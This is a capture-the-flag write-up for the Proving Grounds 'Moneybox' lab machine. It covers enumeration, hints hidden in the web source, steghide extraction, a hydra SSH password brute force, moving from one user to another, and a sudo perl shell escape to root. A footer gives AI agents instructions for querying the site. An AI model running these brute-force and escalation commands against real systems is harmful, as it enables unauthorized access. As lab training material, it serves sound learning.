# Proving grounds Play: Moneybox

Proving grounds Play - Moneybox CTF writeup.

### Nmap

```sh
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.45.153
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1e30ce7281e0a23d5c28888b12acfaac (RSA)
|   256 019dfafbf20637c012fc018b248f53ae (ECDSA)
|_  256 2f34b3d074b47f8d17d237b12e32f7eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

### Fuzzing: Directories

```
/blogs
```

#### Landing page

![img](/files/cMSABheidRFKX4SoAPam)

View-source disclosed a hint about the secret directory

```html
<!--the hint is the another secret directory is S3cr3t-T3xt-->
```

The secret directory source disclosed a secret key `<!..Secret Key 3xtr4ctd4t4 >`.

### FTP

FTP allows anonymous login.

![img](/files/n8CDkVsRrG9NRwrdboRF)

Download the image file and use the secretkey found earlier as password to extract information.

```sh
steghide extract -sf trytofind.jpg
```

![img](/files/4oYzsQJZPzv2uMICWhPC)

A file names data.txt has been written to the same directory, that contains hint about the user and password.

```
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
```

### Crack SSH credentials using hydra

```sh
hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.180.230 -t 4 ssh
```

![img](/files/4OPR0YONehOIW3msOk9h)

SSH to user `renu` using the password.

**Initial Foothold obtained**

![img](/files/ZRgtCqj89ZFWU1cNkjKW)

After searching the directoriees in renu user ,an another user was found in the `/home` directory `lily`.

The user lily has a SSH authorized key which belongs to the user renu, SSH to user lily from user renu.

![img](/files/iRrRkQ5B4XhbyXr1POxn)

### Enumerate user permission

```sh
sudo -l
```

![img](/files/28wMO5MQ3vRTgFAxBnR5)

### Privilege Escalation

#### Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

```sh
sudo perl -e 'exec "/bin/sh";'
```

![img](/files/WbzPX8B0Jr9NO5ZNKtYc)

**Root Obtained**

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thevillagehacker-security.gitbook.io/ctf-writeups/writeups/2023-09-12-proving_grounds_play-moneybox.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.